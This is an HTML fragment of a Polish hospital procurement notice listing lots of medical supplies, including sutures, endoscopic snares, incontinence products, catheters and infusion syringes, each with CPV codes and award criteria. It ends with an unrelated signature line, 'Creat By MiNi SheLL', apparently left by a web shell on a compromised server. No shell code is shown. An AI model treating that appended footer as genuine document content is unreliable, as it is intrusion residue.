5. Nić/Szew powlekany, syntetyczny, plecony , wchłanialny, poliglaktyna 910,powlekany kopolimerem glikolidu i laktydu oraz stearynianem wapnia   dł.igły 48 mm, 1/2 koła-okrągła wzmocniona; rozmiar 1;Szew z pokryciem antybakteryjnym o długość 90 cm (tolerancja dł. Igły +/- 5 %) czas wchłaniania 56-70 dni, czas podtrzymywania tkankowego 75% po 14 dniach	 sztuka	180
6. Nić/Szew powlekany, syntetyczny, plecony , wchłanialny, poliglaktyna 910,powlekany kopolimerem glikolidu i laktydu oraz stearynianem wapnia ; dł.igły 48 mm, 1/2 koła-okrągła wzmocniona; rozmiar 2Szew z pokryciem antybakteryjnym o długości 90cm(tolerancja dł. Igły +/- 5 %) czas wchłaniania 56-70 dni, czas podtrzymywania tkankowego 75% po 14 dniach		sztuka	180
7. Nić/Szew syntetyczny, niewchłanialny, monofilamentowy, poliamid 6 i 6,6;pakowany na mokro o zmniejszonej hydrofilności dł. igły 26 mm, 3/8 koła-odwrotnie tnąca; rozmiar 2/0; długość szwu 75 cm (tolerancja dł. igły i nitki +/- 5%)		sztuka	24
8. Nić/Szew syntetyczny, niewchłanialny, monofilamentowy, poliamid 6 i 6,6;;pakowany na mokro o zmniejszonej hydrofilności  dł. igły 26 mm, 3/8 koła-odwrotnie tnąca; rozmiar 3/0; długość szwu 75 cm (tolerancja dł. igły i nitki +/- 5%)		sztuka	60
9. Nić/Szew syntetyczny, niewchłanialny, monofilamentowy,poliamid 6 i 6,6;;pakowany na mokro o zmniejszonej hydrofilności dł. igły 19mm, 3/8 koła-odwrotnie tnąca; rozmiar 4/0; długość szwu 75 cm (tolerancja dł. Igły i nitki +/- 5 %)		sztuka	72
10. Nić/Szew syntetyczny, niewchłanialny, monofilamentowy,poliamid 6 i 6,6;pakowany na mokro o zmniejszonej hydrofilności ;dł. igły 40mm, 1/2 koła-odwrotnie tnąca; rozmiar 0; długość szwu 100 cm (tolerancja dł. Igły i nitki +/- 5 %)			sztuka	60
11. Nić/Szew syntetyczny, niewchłanialny, monofilamentowy,poliamid 6 i 6,6pakowany na mokro o zmniejszonej hydrofilności ;;dł. igły 48mm, 1/2 koła-odwrotnie tnąca; rozmiar 1; długość szwu 100 cm (tolerancja dł. Igły i nitki +/- 5 %)			sztuka	126
12. Szew niewchłanialny, monofilamentowy polipropylen, syntetyczny, igły o zwiększonej stabilności w imadle, odporne na stępienie i odkształcenie podczas wkłucia (np.typu  Prolene lub równowazny), rozmiary np 5/0, 		sztuka 	36
13. Szew niewchłanialny, monofilamentowy polipropylen, syntetyczny, igły o zwiększonej stabilności w imadle, odporne na stępienie i odkształcenie podczas wkłucia (np.typu  Prolene lub równowazny) rozmiary np 4/0, 	sztuka 	36
14. Szew niewchłanialny, monofilamentowy polipropylen, syntetyczny, igły o zwiększonej stabilności w imadle, odporne na stępienie i odkształcenie podczas wkłucia (np.typu  Prolene lub równowazny) rozmiary np 3/0		sztuka 	36.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Petle elektrochirurgiczne kolonoskopowe (jednorazowego użytku)używane z aparatem elektrochirurgicznym ERBE.Kształt owal Średnica pętli 10mn,15mn,25mn(do wyboru zamawiającego)petla wykonana z plecionego drutu o grubości 0,47mm.Rękojeść skalowana co 10mn,długość narzedzia 2300mn,maxymalna średnica części wprowadzanej do endoskopu2,6mn,minimalna średnica kanału roboczego 2,8mn.pakowane pojedyńczo w sterylnych pakietach.Kompatybilne z endoskopem firmy Olympus i Pentax				sztuka	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Pielucho-majtki dla dorosłych (dzienne), pokryte na całej powierzchni laminatem oddychającym z wewnętrznymi  falbankami bocznymi zapobiegającymi wyciekom,  zapinane na podwójne przylepco- rzepy, zapewniające trwałe i wielokrotne mocowanie,dodatkowa wewnętrzna warstwa z włókniny rozprowadzającej wilgoć po całej powierzchni wkładu chłonnego dopasowane anatomicznym kształtem z elastcznymi ściągaczami  w talii z przodu i z tyłu rozmiarze: obwód pasa: 130-170cm,              sztuka	3000
2. Podkład w rolce z włókniny foliowanej jednorazowego użytku o wymiarach 51cm x50cm+/_5cm z mozliwością przerwania co  50-100cm , długość rolki min 25mb.	 rolka	60
3. Podkład chłonny ok. 90 x 60cm,  (+/- 5cm) z rozdrobnionej celulozy, jednakowej grubości na całej powierzchni ,nieprzepuszczająca wilgoci folia perforowana zewnętrzna,  wewnętrzne pokrycie miękką włókniną 		sztuka	3 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Spodenki  dla pacjenta do badań kolonoskopowych, z otworem , z włokniny polipropylenowej, niejałowe, krótkie nogawki, rozmiar uniwersalny.	8			sztuka	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Układ oddechowy do respiratora współosiowy ,antybakteryjny,materiał z jonami srebra ,dł 2,4m z testerem szczelności i kapturkiem zabezpieczającym ,kompatybilny z respiratorem Bennet,Engstom,Siaretrone		zestaw	20
2. Zestaw z zastawką do wprowadzania i wymiany kateterów oraz elektrod endokawitarnych (introduktor anestezjologiczny): koszulka z zastawką 8,5 Fx 10cm, prowadnik J, rozszerzacz, igła prosta, kranik trójdrożny, osłonka, strzykawka.		sztuka	4
3. Zestawy do wkłuć centralnych: Cewnik poliuretanowy pokryty mieszaniną substancji przeciwbakteryjnych, 2 - światłowy, rozmiar 7Fr. W zestawie  co najmniej: igla, prowadnica, rozszerzadło. 		sztuka	30
4. Zestawy do wkłuć centralnych: Cewnik poliuretanowy pokryty mieszaniną substancji przeciwbakteryjnych, 3 - światłowy, rozmiar 7Fr. W zestawie  co najmniej: igla, prowadnica, rozszerzadło. 	sztuka	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cewnik do drenażu klatki piersiowej z trokarem, rozmiary w zakresie 10F- 28 F, wykonany z bardzo miękkiego , elastycznego PCV zapobiegającego zaginaniu się cewnika, sterylny-podwójnie pakowany, na całej długości cewnika linia/zanacznik Rtg, skalowany co 2 cm.,atraumatyczny otwór koncowy oraz 2 otwory boczne naprzemianległe, zintegrowany łącznik uniwersalny do podłączenia z zestawem do drenażu, stalowy trokar umożliwiający wprowadzenie cewnika, używany do nakłucia oraz efektywnego drenażu po zabiegach klatki piersiowej i/lub kardiochirurgii.          		sztuka	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Strzykawka 50ml bursztynowa /czarna do pompy automatycznej PERFUSOR SPACE  B. BRAUN (strzykawka kompatybilna - pompa z taką strzykawką sygnalizuje zbliżający się/zmierzony czas  końca infuzji) .Podziałka do 50ml,średnica tłoka 30mn,całkowita długość tłoka 155mn, końcówka luer-lock.		sztuka	510
2. Strzykawka 50ml biała do pompy automatycznej PERFUSOR SPACE B. BRAUN (strzykawka kompatybilna - pompa z taką strzykawką sygnalizuje zbliżający się /zmierzony czas końca infuzji). Podziałka do 50ml,średnica tłoka 30mn,całkowita długość tłoka 155mn, końcówka luer-lock.		sztuka	510.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Rękawice do procedur wysokiego ryzyka zakażeń, latexowe lub nitrylowe bezpudrowe,bardzo  elastyczne, odporne na rozdarcia i przekłucia z zastosowaniem w ratownictwie medycznym rozmiar do wyboru zamawiającego. (wykonane zg z EN 374, EN 455) 	sztuka	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com